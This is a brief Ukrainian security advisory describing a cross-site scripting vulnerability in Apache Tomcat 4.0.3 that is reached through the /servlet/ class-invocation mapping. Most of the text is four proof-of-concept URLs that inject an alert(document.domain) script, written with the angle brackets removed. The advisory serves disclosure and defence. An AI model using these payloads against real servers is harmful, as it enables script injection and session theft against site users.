Apache Tomcat — servlet контейнер, який використовується в технологіях Reference Implementation for the Java Servlet and JavaServer Pages. Використовуючи відображення /servlet/ щоб викликати різні servlets/classes, можна змусити Tomcat виконати довільний код сценарію(кутові дужки пропущені):

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/

SCRIPTalert(document.domain)/SCRIPT

tomcat-server/servlet/org.apache.catalina.ContainerServlet/ SCRIPTalert

(document.domain)/SCRIPT

tomcat-server/servlet/org.apache.catalina.Context/ SCRIPTalert

(document.domain)/SCRIPT

tomcat-server/servlet/org.apache.catalina.Globals/ SCRIPTalert

(document.domain)/SCRIPT

уразливість виявлена в Apache Tomcat version 4.0.3